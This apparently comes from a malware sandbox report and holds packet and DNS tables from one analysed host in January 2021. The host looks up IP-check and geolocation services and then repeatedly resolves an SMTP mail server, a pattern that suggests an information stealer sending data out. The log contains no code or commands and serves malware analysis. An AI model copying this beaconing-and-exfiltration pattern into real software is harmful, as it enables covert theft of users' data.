Jan 14, 2021 07:59:34.474976063 CET	57568	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:34.522856951 CET	53	57568	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:43.063770056 CET	50540	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:43.124294996 CET	53	50540	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:53.520191908 CET	54366	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:53.576852083 CET	53	54366	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:54.102127075 CET	53034	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:54.158432007 CET	53	53034	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:00.889106035 CET	57762	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:00.936932087 CET	53	57762	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:01.510406971 CET	55435	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:01.558233976 CET	53	55435	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:01.582978010 CET	50713	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:01.633629084 CET	53	50713	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:01.797789097 CET	56132	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:01.853483915 CET	53	56132	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:03.690836906 CET	58987	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:03.738687038 CET	53	58987	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:08.462229967 CET	56579	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:08.520081043 CET	53	56579	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:08.704726934 CET	60633	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:08.763041019 CET	53	60633	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:13.499056101 CET	61292	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:13.556627989 CET	53	61292	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:22.471590996 CET	63619	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:22.529303074 CET	53	63619	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:23.664125919 CET	64938	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:23.720735073 CET	53	64938	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:25.627404928 CET	61946	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:25.686389923 CET	53	61946	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:27.092154980 CET	64910	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:27.148614883 CET	53	64910	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:27.313196898 CET	52123	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:27.372226954 CET	53	52123	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:28.614837885 CET	56130	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:28.674099922 CET	53	56130	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:30.369122028 CET	56338	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:30.425196886 CET	53	56338	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:31.785188913 CET	59420	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:31.841897964 CET	53	59420	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:32.113264084 CET	58784	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:32.169792891 CET	53	58784	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:34.010411024 CET	63978	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:34.058620930 CET	53	63978	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:37.266448975 CET	62938	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:37.325333118 CET	53	62938	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:37.704689026 CET	55708	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:37.735269070 CET	56803	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:37.776067972 CET	53	55708	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:37.783068895 CET	53	56803	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:41.768898964 CET	57145	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:41.825370073 CET	53	57145	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:42.182595015 CET	55359	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:42.243969917 CET	53	55359	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:43.553025007 CET	58306	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:43.610675097 CET	53	58306	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:46.228390932 CET	64124	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:46.285444021 CET	53	64124	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:47.262676001 CET	49361	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:47.319166899 CET	53	49361	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:52.853676081 CET	63150	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:52.910289049 CET	53	63150	8.8.8.8	192.168.2.3
Jan 14, 2021 08:00:57.864089966 CET	53279	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:00:57.923175097 CET	53	53279	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:00.709014893 CET	56881	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:00.766215086 CET	53	56881	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:01.422801971 CET	53642	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:01.479815960 CET	53	53642	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:05.323237896 CET	55667	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:05.374082088 CET	53	55667	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:06.387660027 CET	54833	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:06.435551882 CET	53	54833	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:12.301712990 CET	62476	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:12.357888937 CET	53	62476	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:13.643379927 CET	49705	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:13.702507019 CET	53	49705	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:15.990230083 CET	61477	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:16.041006088 CET	53	61477	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:17.256880045 CET	61633	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:17.304717064 CET	53	61633	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:17.679095030 CET	55949	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:17.729788065 CET	53	55949	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:18.167495966 CET	57601	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:18.227045059 CET	53	57601	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:20.848212957 CET	49342	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:20.899019003 CET	53	49342	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:25.163115978 CET	56253	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:25.222198963 CET	53	56253	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:27.366777897 CET	49667	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:27.423219919 CET	53	49667	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:29.902163982 CET	55439	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:29.950059891 CET	53	55439	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:34.008392096 CET	57069	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:34.067707062 CET	53	57069	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:38.434175014 CET	57659	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:38.490578890 CET	53	57659	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:41.304433107 CET	54717	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:41.352474928 CET	53	54717	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:43.309600115 CET	63975	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:43.365588903 CET	53	63975	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:47.604231119 CET	56639	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:47.655323982 CET	53	56639	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:51.261096001 CET	51856	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:51.309034109 CET	53	51856	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:52.632894039 CET	56546	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:52.683711052 CET	53	56546	8.8.8.8	192.168.2.3
Jan 14, 2021 08:01:55.232933998 CET	62152	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:01:55.283688068 CET	53	62152	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:01.687004089 CET	53470	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:01.734879017 CET	53	53470	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:03.720463037 CET	56446	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:03.776787043 CET	53	56446	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:06.874089003 CET	59631	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:06.930296898 CET	53	59631	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:07.400751114 CET	55515	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:07.457195997 CET	53	55515	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:08.036328077 CET	64547	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:08.085427999 CET	53	64547	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:08.841780901 CET	51759	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:08.892477989 CET	53	51759	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:08.928555965 CET	59207	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:08.987667084 CET	53	59207	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:09.344995975 CET	54269	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:09.404113054 CET	53	54269	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:09.882831097 CET	54856	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:09.939145088 CET	53	54856	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:10.416321993 CET	64140	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:10.475392103 CET	53	64140	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:10.971044064 CET	62271	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:11.025665045 CET	57404	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:11.027297974 CET	53	62271	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:11.084976912 CET	53	57404	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:11.736547947 CET	62997	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:11.784336090 CET	53	62997	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:12.177129030 CET	57712	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:12.233146906 CET	53	57712	8.8.8.8	192.168.2.3
Jan 14, 2021 08:02:14.219427109 CET	60065	53	192.168.2.3	8.8.8.8
Jan 14, 2021 08:02:14.275495052 CET	53	60065	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 14, 2021 07:59:53.520191908 CET	192.168.2.3	8.8.8.8	0x577c	Standard query (0)	94.197.2.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Jan 14, 2021 07:59:54.102127075 CET	192.168.2.3	8.8.8.8	0xf2d	Standard query (0)	whatismyipaddress.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.510406971 CET	192.168.2.3	8.8.8.8	0xae5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.582978010 CET	192.168.2.3	8.8.8.8	0x2b6d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:08.462229967 CET	192.168.2.3	8.8.8.8	0xe970	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:08.704726934 CET	192.168.2.3	8.8.8.8	0xd6f8	Standard query (0)	freegeoip.app	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:22.471590996 CET	192.168.2.3	8.8.8.8	0x9f9c	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:23.664125919 CET	192.168.2.3	8.8.8.8	0x647	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:25.627404928 CET	192.168.2.3	8.8.8.8	0x238a	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:27.092154980 CET	192.168.2.3	8.8.8.8	0x26eb	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:27.313196898 CET	192.168.2.3	8.8.8.8	0x7f29	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:28.614837885 CET	192.168.2.3	8.8.8.8	0xe531	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:30.369122028 CET	192.168.2.3	8.8.8.8	0xd404	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:31.785188913 CET	192.168.2.3	8.8.8.8	0xaf23	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:32.113264084 CET	192.168.2.3	8.8.8.8	0xf54d	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:34.010411024 CET	192.168.2.3	8.8.8.8	0x9690	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:37.266448975 CET	192.168.2.3	8.8.8.8	0x4c64	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:37.735269070 CET	192.168.2.3	8.8.8.8	0x732c	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:41.768898964 CET	192.168.2.3	8.8.8.8	0xa0a4	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:42.182595015 CET	192.168.2.3	8.8.8.8	0x12da	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:46.228390932 CET	192.168.2.3	8.8.8.8	0x1ce7	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:47.262676001 CET	192.168.2.3	8.8.8.8	0x3e25	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:52.853676081 CET	192.168.2.3	8.8.8.8	0x58ab	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:57.864089966 CET	192.168.2.3	8.8.8.8	0x8ab1	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:00.709014893 CET	192.168.2.3	8.8.8.8	0x6063	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:01.422801971 CET	192.168.2.3	8.8.8.8	0x7feb	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:05.323237896 CET	192.168.2.3	8.8.8.8	0x76e7	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:06.387660027 CET	192.168.2.3	8.8.8.8	0x3bdb	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:12.301712990 CET	192.168.2.3	8.8.8.8	0x625f	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:13.643379927 CET	192.168.2.3	8.8.8.8	0x5369	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:17.256880045 CET	192.168.2.3	8.8.8.8	0xebf3	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:18.167495966 CET	192.168.2.3	8.8.8.8	0x676	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:20.848212957 CET	192.168.2.3	8.8.8.8	0x8db1	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:25.163115978 CET	192.168.2.3	8.8.8.8	0xabf5	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:27.366777897 CET	192.168.2.3	8.8.8.8	0xdeb2	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:29.902163982 CET	192.168.2.3	8.8.8.8	0xbe63	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:34.008392096 CET	192.168.2.3	8.8.8.8	0x971c	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:38.434175014 CET	192.168.2.3	8.8.8.8	0x97b9	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:41.304433107 CET	192.168.2.3	8.8.8.8	0xdc66	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:43.309600115 CET	192.168.2.3	8.8.8.8	0x88bc	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:47.604231119 CET	192.168.2.3	8.8.8.8	0xdf13	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:51.261096001 CET	192.168.2.3	8.8.8.8	0xce33	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:52.632894039 CET	192.168.2.3	8.8.8.8	0x94fc	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:55.232933998 CET	192.168.2.3	8.8.8.8	0x51e6	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:01.687004089 CET	192.168.2.3	8.8.8.8	0x5fc3	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:03.720463037 CET	192.168.2.3	8.8.8.8	0x1935	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:08.928555965 CET	192.168.2.3	8.8.8.8	0x2d3f	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:10.971044064 CET	192.168.2.3	8.8.8.8	0x4489	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:14.219427109 CET	192.168.2.3	8.8.8.8	0x4c3e	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 14, 2021 07:59:53.576852083 CET	8.8.8.8	192.168.2.3	0x577c	Name error (3)	94.197.2.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Jan 14, 2021 07:59:54.158432007 CET	8.8.8.8	192.168.2.3	0xf2d	No error (0)	whatismyipaddress.com		104.16.154.36	A (IP address)	IN (0x0001)
Jan 14, 2021 07:59:54.158432007 CET	8.8.8.8	192.168.2.3	0xf2d	No error (0)	whatismyipaddress.com		104.16.155.36	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.558233976 CET	8.8.8.8	192.168.2.3	0xae5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 08:00:01.558233976 CET	8.8.8.8	192.168.2.3	0xae5	No error (0)	checkip.dyndns.com		131.186.161.70	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.558233976 CET	8.8.8.8	192.168.2.3	0xae5	No error (0)	checkip.dyndns.com		131.186.113.70	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.558233976 CET	8.8.8.8	192.168.2.3	0xae5	No error (0)	checkip.dyndns.com		216.146.43.71	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.558233976 CET	8.8.8.8	192.168.2.3	0xae5	No error (0)	checkip.dyndns.com		216.146.43.70	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.558233976 CET	8.8.8.8	192.168.2.3	0xae5	No error (0)	checkip.dyndns.com		162.88.193.70	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.633629084 CET	8.8.8.8	192.168.2.3	0x2b6d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 08:00:01.633629084 CET	8.8.8.8	192.168.2.3	0x2b6d	No error (0)	checkip.dyndns.com		131.186.113.70	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.633629084 CET	8.8.8.8	192.168.2.3	0x2b6d	No error (0)	checkip.dyndns.com		131.186.161.70	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.633629084 CET	8.8.8.8	192.168.2.3	0x2b6d	No error (0)	checkip.dyndns.com		216.146.43.70	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.633629084 CET	8.8.8.8	192.168.2.3	0x2b6d	No error (0)	checkip.dyndns.com		162.88.193.70	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:01.633629084 CET	8.8.8.8	192.168.2.3	0x2b6d	No error (0)	checkip.dyndns.com		216.146.43.71	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:08.520081043 CET	8.8.8.8	192.168.2.3	0xe970	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:08.763041019 CET	8.8.8.8	192.168.2.3	0xd6f8	No error (0)	freegeoip.app		172.67.188.154	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:08.763041019 CET	8.8.8.8	192.168.2.3	0xd6f8	No error (0)	freegeoip.app		104.21.19.200	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:22.529303074 CET	8.8.8.8	192.168.2.3	0x9f9c	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:23.720735073 CET	8.8.8.8	192.168.2.3	0x647	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:25.686389923 CET	8.8.8.8	192.168.2.3	0x238a	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:27.148614883 CET	8.8.8.8	192.168.2.3	0x26eb	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:27.372226954 CET	8.8.8.8	192.168.2.3	0x7f29	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:28.674099922 CET	8.8.8.8	192.168.2.3	0xe531	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:30.425196886 CET	8.8.8.8	192.168.2.3	0xd404	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:31.841897964 CET	8.8.8.8	192.168.2.3	0xaf23	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:32.169792891 CET	8.8.8.8	192.168.2.3	0xf54d	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:34.058620930 CET	8.8.8.8	192.168.2.3	0x9690	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:37.325333118 CET	8.8.8.8	192.168.2.3	0x4c64	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:37.783068895 CET	8.8.8.8	192.168.2.3	0x732c	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:41.825370073 CET	8.8.8.8	192.168.2.3	0xa0a4	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:42.243969917 CET	8.8.8.8	192.168.2.3	0x12da	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:46.285444021 CET	8.8.8.8	192.168.2.3	0x1ce7	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:47.319166899 CET	8.8.8.8	192.168.2.3	0x3e25	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:52.910289049 CET	8.8.8.8	192.168.2.3	0x58ab	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:00:57.923175097 CET	8.8.8.8	192.168.2.3	0x8ab1	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:00.766215086 CET	8.8.8.8	192.168.2.3	0x6063	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:01.479815960 CET	8.8.8.8	192.168.2.3	0x7feb	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:05.374082088 CET	8.8.8.8	192.168.2.3	0x76e7	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:06.435551882 CET	8.8.8.8	192.168.2.3	0x3bdb	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:12.357888937 CET	8.8.8.8	192.168.2.3	0x625f	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:13.702507019 CET	8.8.8.8	192.168.2.3	0x5369	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:17.304717064 CET	8.8.8.8	192.168.2.3	0xebf3	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:18.227045059 CET	8.8.8.8	192.168.2.3	0x676	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:20.899019003 CET	8.8.8.8	192.168.2.3	0x8db1	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:25.222198963 CET	8.8.8.8	192.168.2.3	0xabf5	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:27.423219919 CET	8.8.8.8	192.168.2.3	0xdeb2	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:29.950059891 CET	8.8.8.8	192.168.2.3	0xbe63	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:34.067707062 CET	8.8.8.8	192.168.2.3	0x971c	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:38.490578890 CET	8.8.8.8	192.168.2.3	0x97b9	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:41.352474928 CET	8.8.8.8	192.168.2.3	0xdc66	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:43.365588903 CET	8.8.8.8	192.168.2.3	0x88bc	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:47.655323982 CET	8.8.8.8	192.168.2.3	0xdf13	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:51.309034109 CET	8.8.8.8	192.168.2.3	0xce33	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:52.683711052 CET	8.8.8.8	192.168.2.3	0x94fc	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:01:55.283688068 CET	8.8.8.8	192.168.2.3	0x51e6	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:01.734879017 CET	8.8.8.8	192.168.2.3	0x5fc3	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
